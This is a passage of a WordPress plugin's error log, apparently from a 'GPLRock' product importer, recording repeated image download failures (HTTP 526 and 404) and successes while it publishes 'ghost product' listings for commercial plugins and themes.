12:20:29 UTC] GPLRock WARNING: Image download failed for product directory-plus-business-directory-php-script. URL: https://meldwp.com/wp-content/uploads/directory-plus---business-directory-php-script-7200.webp [06-Apr-2026 12:20:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: directory-plus-business-directory-php-script [06-Apr-2026 12:20:29 UTC] GPLRock: Image download failed for product bookly-mollie-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:32 UTC] GPLRock: Image download failed for product bookly-mollie-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-mollie-add-on-25886.webp for product bookly-mollie-add-on after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:20:34 UTC] GPLRock: Image download failed for product bookly-mollie-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:36 UTC] GPLRock: Image download failed for product bookly-mollie-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-mollie-add-on-25886.webp for product bookly-mollie-add-on after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:20:38 UTC] GPLRock WARNING: Image download failed for product bookly-mollie-add-on. URL: https://meldwp.com/wp-content/uploads/bookly-mollie-add-on-25886.webp [06-Apr-2026 12:20:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookly-mollie-add-on [06-Apr-2026 12:20:38 UTC] GPLRock: Image download failed for product wpbookit-coupons-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:40 UTC] GPLRock: Image download failed for product wpbookit-coupons-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbookit---coupons-addon-9542.webp for product wpbookit-coupons-addon after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:20:42 UTC] GPLRock: Image download failed for product wpbookit-coupons-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:44 UTC] GPLRock: Image download failed for product wpbookit-coupons-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbookit---coupons-addon-9542.webp for product wpbookit-coupons-addon after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:20:47 UTC] GPLRock WARNING: Image download failed for product wpbookit-coupons-addon. URL: https://meldwp.com/wp-content/uploads/wpbookit---coupons-addon-9542.webp [06-Apr-2026 12:20:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbookit-coupons-addon [06-Apr-2026 12:20:47 UTC] GPLRock: Image download failed for product deactivate-plugins-per-page-improve-wordpress-performance (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:49 UTC] GPLRock: Image download failed for product deactivate-plugins-per-page-improve-wordpress-performance (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/deactivate-plugins-per-page---improve-wordpress-performance-8388.webp for product deactivate-plugins-per-page-improve-wordpress-performance after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:20:51 UTC] GPLRock: Image download failed for product deactivate-plugins-per-page-improve-wordpress-performance (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:53 UTC] GPLRock: Image download failed for product deactivate-plugins-per-page-improve-wordpress-performance (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/deactivate-plugins-per-page---improve-wordpress-performance-8388.webp for product deactivate-plugins-per-page-improve-wordpress-performance after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:20:55 UTC] GPLRock WARNING: Image download failed for product deactivate-plugins-per-page-improve-wordpress-performance. URL: https://meldwp.com/wp-content/uploads/deactivate-plugins-per-page---improve-wordpress-performance-8388.webp [06-Apr-2026 12:20:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: deactivate-plugins-per-page-improve-wordpress-performance [06-Apr-2026 12:20:55 UTC] GPLRock: Image download failed for product self-hosted-google-fonts-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:57 UTC] GPLRock: Image download failed for product self-hosted-google-fonts-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/self-hosted-google-fonts-pro-15567.webp for product self-hosted-google-fonts-pro after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:21:00 UTC] GPLRock: Image download failed for product self-hosted-google-fonts-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:02 UTC] GPLRock: Image download failed for product self-hosted-google-fonts-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/self-hosted-google-fonts-pro-15567.webp for product self-hosted-google-fonts-pro after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:21:04 UTC] GPLRock WARNING: Image download failed for product self-hosted-google-fonts-pro. URL: https://meldwp.com/wp-content/uploads/self-hosted-google-fonts-pro-15567.webp [06-Apr-2026 12:21:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: self-hosted-google-fonts-pro [06-Apr-2026 12:21:04 UTC] GPLRock: Image download failed for product panmail-woocommerce-email-customizer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:06 UTC] GPLRock: Image download failed for product panmail-woocommerce-email-customizer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/panmail---woocommerce-email-customizer-5896.webp for product panmail-woocommerce-email-customizer after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:21:08 UTC] GPLRock: Image download failed for product panmail-woocommerce-email-customizer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:10 UTC] GPLRock: Image download failed for product panmail-woocommerce-email-customizer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/panmail---woocommerce-email-customizer-5896.webp for product panmail-woocommerce-email-customizer after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:21:12 UTC] GPLRock WARNING: Image download failed for product panmail-woocommerce-email-customizer. URL: https://meldwp.com/wp-content/uploads/panmail---woocommerce-email-customizer-5896.webp [06-Apr-2026 12:21:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: panmail-woocommerce-email-customizer [06-Apr-2026 12:21:13 UTC] GPLRock: Image downloaded successfully for product restrict-content-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1eb23a7c.webp [06-Apr-2026 12:21:13 UTC] GPLRock: Using pre-downloaded image for product restrict-content-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1eb23a7c.webp [06-Apr-2026 12:21:13 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-for-elementor [06-Apr-2026 12:21:13 UTC] GPLRock: Image download failed for product 6ammart-react-user-website (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:15 UTC] GPLRock: Image download failed for product 6ammart-react-user-website (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/6ammart---react-user-website-29696.webp for product 6ammart-react-user-website after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:21:17 UTC] GPLRock: Image download failed for product 6ammart-react-user-website (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:19 UTC] GPLRock: Image download failed for product 6ammart-react-user-website (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/6ammart---react-user-website-29696.webp for product 6ammart-react-user-website after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:21:21 UTC] GPLRock WARNING: Image download failed for product 6ammart-react-user-website. URL: https://meldwp.com/wp-content/uploads/6ammart---react-user-website-29696.webp [06-Apr-2026 12:21:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 6ammart-react-user-website [06-Apr-2026 12:21:22 UTC] GPLRock: Image download failed for product fbar-responsive-wordpress-demo-switch-bar-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:24 UTC] GPLRock: Image download failed for product fbar-responsive-wordpress-demo-switch-bar-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fbar---responsive-wordpress-demo-switch-bar-plugin-32479.webp for product fbar-responsive-wordpress-demo-switch-bar-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:21:26 UTC] GPLRock: Image download failed for product fbar-responsive-wordpress-demo-switch-bar-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:28 UTC] GPLRock: Image download failed for product fbar-responsive-wordpress-demo-switch-bar-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:21:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fbar---responsive-wordpress-demo-switch-bar-plugin-32479.webp for product fbar-responsive-wordpress-demo-switch-bar-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:21:30 UTC] GPLRock WARNING: Image download failed for product fbar-responsive-wordpress-demo-switch-bar-plugin. URL: https://meldwp.com/wp-content/uploads/fbar---responsive-wordpress-demo-switch-bar-plugin-32479.webp [06-Apr-2026 12:21:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fbar-responsive-wordpress-demo-switch-bar-plugin [06-Apr-2026 12:23:01 UTC] GPLRock: Image downloaded successfully for product ninja-forms-mailchimp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b134953.jpg [06-Apr-2026 12:23:01 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-mailchimp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b134953.jpg [06-Apr-2026 12:23:01 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-mailchimp [06-Apr-2026 12:23:02 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-appointments-plus (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-643ae96e.jpg [06-Apr-2026 12:23:02 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-appointments-plus: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-643ae96e.jpg [06-Apr-2026 12:23:02 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-appointments-plus [06-Apr-2026 12:23:04 UTC] GPLRock: Image downloaded successfully for product simplemag-magazine-theme-for-creative-stuff (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6df44fcd.jpg [06-Apr-2026 12:23:04 UTC] GPLRock: Using pre-downloaded image for product simplemag-magazine-theme-for-creative-stuff: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6df44fcd.jpg [06-Apr-2026 12:23:04 UTC] GPLRock: Ghost product published with image - Product ID: simplemag-magazine-theme-for-creative-stuff [06-Apr-2026 12:23:13 UTC] GPLRock: Image downloaded successfully for product mainwp-team-control (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97abb976.jpg [06-Apr-2026 12:23:13 UTC] GPLRock: Using pre-downloaded image for product mainwp-team-control: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97abb976.jpg [06-Apr-2026 12:23:13 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-team-control [06-Apr-2026 12:23:14 UTC] GPLRock: Image downloaded successfully for product gravity-perks-terms-of-service-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d5b6af47.jpg [06-Apr-2026 12:23:14 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-terms-of-service-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d5b6af47.jpg [06-Apr-2026 12:23:14 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-terms-of-service-plugin [06-Apr-2026 12:23:16 UTC] GPLRock: Image downloaded successfully for product mythemeshop-nominal-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb187387.jpg [06-Apr-2026 12:23:16 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-nominal-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb187387.jpg [06-Apr-2026 12:23:16 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-nominal-wordpress-theme [06-Apr-2026 12:23:17 UTC] GPLRock: Image downloaded successfully for product elmastudio-bugis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5f209a95.jpg [06-Apr-2026 12:23:18 UTC] GPLRock: Using pre-downloaded image for product elmastudio-bugis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5f209a95.jpg [06-Apr-2026 12:23:18 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-bugis-wordpress-theme [06-Apr-2026 12:23:19 UTC] GPLRock: Image downloaded successfully for product mythemeshop-awake-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-239a4333.jpg [06-Apr-2026 12:23:19 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-awake-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-239a4333.jpg [06-Apr-2026 12:23:19 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-awake-wordpress-theme [06-Apr-2026 12:23:22 UTC] GPLRock: Image download failed for product gymbase-responsive-gym-fitness-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:23:26 UTC] GPLRock: Image download failed for product gymbase-responsive-gym-fitness-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:23:30 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/GymBase-Responsive-Gym-Fitness-WordPress-Theme.jpg for product gymbase-responsive-gym-fitness-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 12:23:32 UTC] GPLRock: Image download failed for product gymbase-responsive-gym-fitness-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:23:36 UTC] GPLRock: Image download failed for product gymbase-responsive-gym-fitness-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:23:40 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/GymBase-Responsive-Gym-Fitness-WordPress-Theme.jpg for product gymbase-responsive-gym-fitness-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 12:23:40 UTC] GPLRock WARNING: Image download failed for product gymbase-responsive-gym-fitness-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/09/GymBase-Responsive-Gym-Fitness-WordPress-Theme.jpg [06-Apr-2026 12:23:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gymbase-responsive-gym-fitness-wordpress-theme [06-Apr-2026 12:23:42 UTC] GPLRock: Image downloaded successfully for product seo-friendly-images-pro-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c671332c.jpg [06-Apr-2026 12:23:42 UTC] GPLRock: Using pre-downloaded image for product seo-friendly-images-pro-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c671332c.jpg [06-Apr-2026 12:23:42 UTC] GPLRock: Ghost product published with image - Product ID: seo-friendly-images-pro-for-wordpress [06-Apr-2026 12:24:27 UTC] GPLRock: Image downloaded successfully for product yogalaxy-yoga-pilates-fitness-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4a37ae94.webp [06-Apr-2026 12:24:27 UTC] GPLRock: Using pre-downloaded image for product yogalaxy-yoga-pilates-fitness-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4a37ae94.webp [06-Apr-2026 12:24:27 UTC] GPLRock: Ghost product published with image - Product ID: yogalaxy-yoga-pilates-fitness-studio-elementor-template-kit [06-Apr-2026 12:24:28 UTC] GPLRock: Image downloaded successfully for product yello-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-49c60aa2.webp [06-Apr-2026 12:24:28 UTC] GPLRock: Using pre-downloaded image for product yello-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-49c60aa2.webp [06-Apr-2026 12:24:28 UTC] GPLRock: Ghost product published with image - Product ID: yello-digital-agency-elementor-template-kit [06-Apr-2026 12:24:30 UTC] GPLRock: Image downloaded successfully for product yanbu-digital-marketing-seo-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73e66f9d.webp [06-Apr-2026 12:24:30 UTC] GPLRock: Using pre-downloaded image for product yanbu-digital-marketing-seo-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73e66f9d.webp [06-Apr-2026 12:24:30 UTC] GPLRock: Ghost product published with image - Product ID: yanbu-digital-marketing-seo-elementor-template-kit [06-Apr-2026 12:24:31 UTC] GPLRock: Image downloaded successfully for product yakopay-online-payment-app-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dcac9991.webp [06-Apr-2026 12:24:31 UTC] GPLRock: Using pre-downloaded image for product yakopay-online-payment-app-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dcac9991.webp [06-Apr-2026 12:24:31 UTC] GPLRock: Ghost product published with image - Product ID: yakopay-online-payment-app-elementor-template-kit [06-Apr-2026 12:24:33 UTC] GPLRock: Image downloaded successfully for product whiz-travel-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd0673ae.webp [06-Apr-2026 12:24:33 UTC] GPLRock: Using pre-downloaded image for product whiz-travel-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd0673ae.webp [06-Apr-2026 12:24:33 UTC] GPLRock: Ghost product published with image - Product ID: whiz-travel-agency-elementor-template-kit [06-Apr-2026 12:24:34 UTC] GPLRock: Image downloaded successfully for product vinic-coworking-space-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3d6c986.webp [06-Apr-2026 12:24:34 UTC] GPLRock: Using pre-downloaded image for product vinic-coworking-space-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3d6c986.webp [06-Apr-2026 12:24:34 UTC] GPLRock: Ghost product published with image - Product ID: vinic-coworking-space-elementor-template-kit [06-Apr-2026 12:24:36 UTC] GPLRock: Image downloaded successfully for product vinera-wine-vineyard-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e91efc8.jpg [06-Apr-2026 12:24:36 UTC] GPLRock: Using pre-downloaded image for product vinera-wine-vineyard-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e91efc8.jpg [06-Apr-2026 12:24:36 UTC] GPLRock: Ghost product published with image - Product ID: vinera-wine-vineyard-elementor-template-kit [06-Apr-2026 12:24:37 UTC] GPLRock: Image downloaded successfully for product vine-gloss-wine-shop-vineyard-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-268a4ee1.webp [06-Apr-2026 12:24:37 UTC] GPLRock: Using pre-downloaded image for product vine-gloss-wine-shop-vineyard-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-268a4ee1.webp [06-Apr-2026 12:24:37 UTC] GPLRock: Ghost product published with image - Product ID: vine-gloss-wine-shop-vineyard-elementor-template-kit [06-Apr-2026 12:24:38 UTC] GPLRock: Image downloaded successfully for product villenoir-wine-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c83a3fe.webp [06-Apr-2026 12:24:38 UTC] GPLRock: Using pre-downloaded image for product villenoir-wine-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c83a3fe.webp [06-Apr-2026 12:24:38 UTC] GPLRock: Ghost product published with image - Product ID: villenoir-wine-template-kit [06-Apr-2026 12:24:40 UTC] GPLRock: Image downloaded successfully for product villague-private-villa-resort-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2ef87c6c.webp [06-Apr-2026 12:24:40 UTC] GPLRock: Using pre-downloaded image for product villague-private-villa-resort-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2ef87c6c.webp [06-Apr-2026 12:24:40 UTC] GPLRock: Ghost product published with image - Product ID: villague-private-villa-resort-elementor-template-kit [06-Apr-2026 12:25:38 UTC] GPLRock: Image downloaded successfully for product themify-builder-progress-bar (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8d1e5fe4.jpg [06-Apr-2026 12:25:38 UTC] GPLRock: Using pre-downloaded image for product themify-builder-progress-bar: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8d1e5fe4.jpg [06-Apr-2026 12:25:38 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-progress-bar [06-Apr-2026 12:25:40 UTC] GPLRock: Image downloaded successfully for product eventon-full-cal (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4b0e9787.jpg [06-Apr-2026 12:25:40 UTC] GPLRock: Using pre-downloaded image for product eventon-full-cal: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4b0e9787.jpg [06-Apr-2026 12:25:40 UTC] GPLRock: Ghost product published with image - Product ID: eventon-full-cal [06-Apr-2026 12:25:41 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-license-free-download (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b4e0551.jpg [06-Apr-2026 12:25:41 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-license-free-download: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b4e0551.jpg [06-Apr-2026 12:25:41 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-license-free-download [06-Apr-2026 12:25:43 UTC] GPLRock: Image downloaded successfully for product mainwp-maintenance (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c3c5429e.jpg [06-Apr-2026 12:25:43 UTC] GPLRock: Using pre-downloaded image for product mainwp-maintenance: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c3c5429e.jpg [06-Apr-2026 12:25:43 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-maintenance [06-Apr-2026 12:25:44 UTC] GPLRock: Image downloaded successfully for product geodirectory-embeddable-ratings-badge (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-99b3a2d9.jpg [06-Apr-2026 12:25:44 UTC] GPLRock: Using pre-downloaded image for product geodirectory-embeddable-ratings-badge: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-99b3a2d9.jpg [06-Apr-2026 12:25:44 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-embeddable-ratings-badge [06-Apr-2026 12:25:46 UTC] GPLRock: Image downloaded successfully for product mythemeshop-magxp-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47302c99.jpg [06-Apr-2026 12:25:46 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-magxp-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47302c99.jpg [06-Apr-2026 12:25:46 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-magxp-wordpress-theme [06-Apr-2026 12:25:48 UTC] GPLRock: Image downloaded successfully for product learnpress-announcements-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98a32897.jpg [06-Apr-2026 12:25:48 UTC] GPLRock: Using pre-downloaded image for product learnpress-announcements-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98a32897.jpg [06-Apr-2026 12:25:48 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-announcements-addon [06-Apr-2026 12:25:49 UTC] GPLRock: Image downloaded successfully for product users-insights-integrations (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6b78829a.jpg [06-Apr-2026 12:25:49 UTC] GPLRock: Using pre-downloaded image for product users-insights-integrations: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6b78829a.jpg [06-Apr-2026 12:25:49 UTC] GPLRock: Ghost product published with image - Product ID: users-insights-integrations [06-Apr-2026 12:25:51 UTC] GPLRock: Image downloaded successfully for product searchwp-give-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-901ff771.jpg [06-Apr-2026 12:25:51 UTC] GPLRock: Using pre-downloaded image for product searchwp-give-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-901ff771.jpg [06-Apr-2026 12:25:51 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-give-integration [06-Apr-2026 12:25:53 UTC] GPLRock: Image downloaded successfully for product css-igniter-milos-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-24d44777.jpg [06-Apr-2026 12:25:53 UTC] GPLRock: Using pre-downloaded image for product css-igniter-milos-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-24d44777.jpg [06-Apr-2026 12:25:53 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-milos-wordpress-theme [06-Apr-2026 12:27:12 UTC] GPLRock: Image downloaded successfully for product mythemeshop-best-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2b2f4dcd.jpg [06-Apr-2026 12:27:12 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-best-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2b2f4dcd.jpg [06-Apr-2026 12:27:12 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-best-wordpress-theme [06-Apr-2026 12:27:14 UTC] GPLRock: Image downloaded successfully for product ithemes-content-upgrades (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5497d0d0.jpg [06-Apr-2026 12:27:14 UTC] GPLRock: Using pre-downloaded image for product ithemes-content-upgrades: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5497d0d0.jpg [06-Apr-2026 12:27:14 UTC] GPLRock: Ghost product published with image - Product ID: ithemes-content-upgrades [06-Apr-2026 12:27:15 UTC] GPLRock: Image downloaded successfully for product themify-builder-ab-image (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e004fc93.jpg [06-Apr-2026 12:27:15 UTC] GPLRock: Using pre-downloaded image for product themify-builder-ab-image: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e004fc93.jpg [06-Apr-2026 12:27:15 